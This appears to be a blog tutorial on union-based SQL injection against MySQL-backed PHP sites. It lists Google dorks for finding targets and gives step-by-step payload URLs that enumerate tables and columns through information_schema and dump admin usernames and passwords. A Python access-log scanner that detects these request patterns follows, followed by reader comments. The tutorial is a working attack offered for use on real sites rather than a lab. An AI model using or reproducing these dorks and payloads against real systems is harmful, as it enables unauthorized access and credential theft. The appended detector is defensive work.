Keywords you need to know
-------------------------------
Character : ', -
Comments : /*, --
-------------------------------
Information: "information_schema" only works for MySQL version 5.x and above.
The Google dorks that will be used are:
"inurl:news.php?id="
"inurl:index.php?id="
"inurl:trainers.php?id="
"inurl:buy.php?category="
"news-article.php?id="
"inurl:article.php?ID="
-------------------------First Step-------------------------
www.target.com/news.php?id=1
Add the character ' at the end of the URL to see whether the site is vulnerable to SQL injection.
Sample injection:
www.target.com/news.php?id=1'
or
www.target.com/news.php?id=-1
Examples of error messages:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near line 1
warning: mysql_fetch_array(): supplied argument is not a valid MYSQL
result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line
-------------------------Second Step-------------------------
Find the number of tables available in the database.
Add +order+by+1-- at the end of the URL.
Example:
Code:
www.target.com/news.php?id=1+order+by+1--
or
www.target.com/news.php?id=1+order+by+1/* (check in stages)
www.target.com/news.php?id=1+order+by+2/*
www.target.com/news.php?id=1+order+by+3/* (keep going until an error appears)
For this tutorial, the table count obtained was 3.
-------------------------Third Step-------------------------
Use the UNION command to bring out the numbers that we will use later.
Command to use: +union+select+1,2,3-- at the end of the URL
Example:
www.target.com/news.php?id=1+union+select+1,2,3--
Example: the number 2 comes out.
Then we put version() in place of number (2).
Example:
www.target.com/news.php?id=1+union+select+1,version(),3--
and the version will be displayed where the number appeared.
Example:
5.1.47-community-log
------
|info|
------
version() = shows the MySQL version in use
database() = shows the name of the database in use
-------------------------Fourth Step-------------------------
To see the names of the tables on the site, the command is:
table_name ---> put in place of the number that came out earlier (2)
+from+information_schema.tables-- ---> put after the last digit.
Example:
www.target.com/news.php?id=1+union+select+1,table_name,3+from+information_schema.tables--
or we add the character - in front of the first digit:
www.target.com/news.php?id=-1+union+select+1,table_name,3+from+information_schema.tables--
-------------------------Fifth Step-------------------------
Bring out all the content that is in the table:
group_concat(table_name) ---> put in place of the number that came out earlier (2)
+from+information_schema.tables+where+table_schema=database()-- ---> put after the last digit.
Example:
www.target.com/news.php?id=1+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--
-------------------------Sixth Step-------------------------
Bring out the content that is in the TABLE:
group_concat(column_name) ---> put in place of the number that came out earlier (2)
+from+information_schema.columns+where+table_name=0xResulOfConvertedTextTableAdmin--
(the table name has to be converted to hexadecimal)
------
|info|
------
Websites that can be used to convert the table name to hexadecimal:
-----> www.piclist.com/techref/ascii.htm
-----> www.centricle.com/tools/ascii-hex/
As an example we will use the table ADMIN,
and the converted result is 41444D494E
Example:
www.target.com/news.php?id=1+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x41444D494E--
-------------------------Seventh Step-------------------------
Bring out the contents of the results that we managed to get from the table Admin:
concat_ws(0x3a,"column names contained in the table ADMIN") ---> put in place of the number that came out earlier (2)
+from+Admin-- ---> The original column
Example:
www.target.com/news.php?id=1+union+select+1,concat_ws(0x3a,id,username,password),3+from+Admin--
And we obtain the admin username and password for the website.
Then you have to find the admin login :)
Shorter tutorial:
http://pastebin.com/pVVjSzhF
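
The requests in the steps above leave a recognisable trail in web server access logs. The following Python scanner is an added example, not part of the original post, that flags those request shapes per client IP; the log lines are constructed, and the rule names and the function `scan_access_log` are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines in an Apache-style access log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:01 +0000] "GET /news.php?id=1 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:13:55:09 +0000] "GET /news.php?id=1' HTTP/1.1" 200 412
203.0.113.5 - - [10/Oct/2023:13:55:20 +0000] "GET /news.php?id=1+order+by+4-- HTTP/1.1" 200 398
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /news.php?id=-1+union+select+1,group_concat(table_name),3+from+information_schema.tables-- HTTP/1.1" 200 6011
198.51.100.7 - - [10/Oct/2023:13:57:30 +0000] "GET /article.php?ID=42 HTTP/1.1" 200 7340
198.51.100.7 - - [10/Oct/2023:13:58:00 +0000] "GET /search.php?q=trade+union+news HTTP/1.1" 200 2210
"""

# One rule per request shape used in the steps above (rule names are hypothetical).
RULES = {
    "quote_probe": re.compile(r"=-?\d+'"),                      # id=1'
    "order_by_count": re.compile(r"\border\s+by\s+\d+", re.I),  # order by N
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "concat_dump": re.compile(r"\b(group_concat|concat_ws)\s*\(", re.I),
    "hex_literal": re.compile(r"=\s*0x[0-9a-f]{4,}", re.I),     # table_name=0x...
}
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def scan_access_log(text):
    """Return {client_ip: {rule_name: hit_count}} for requests matching any rule."""
    findings = defaultdict(lambda: defaultdict(int))
    for line in text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line we understand
        ip, target = m.groups()
        _, _, query = target.partition("?")
        decoded = unquote_plus(query)  # turn '+' and %xx back into the text MySQL sees
        for name, rule in RULES.items():
            if rule.search(decoded):
                findings[ip][name] += 1
    return {ip: dict(hits) for ip, hits in findings.items()}


if __name__ == "__main__":
    for ip, hits in scan_access_log(SAMPLE_LOG).items():
        print(ip, hits)
```

A client that trips several rules in sequence (quote probe, then `order by`, then `union select` against `information_schema`) is following this procedure; the ordinary search for "trade union news" in the sample is not flagged.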
2 comments:
Thanks for providing information about SQL injection implementation, I will surely try it.
Hello all, I am new to this forum and I would like to ask what the benefits of SQL training are, what topics should be covered, and it is kind of bothering me ... and has anyone studied from this course wiziq.com/course/125-comprehensive-introduction-to-sql of SQL tutorial online?? Or tell me any other guidance...
I would really appreciate help... and also I would like to thank you for all the information you are providing on SQL.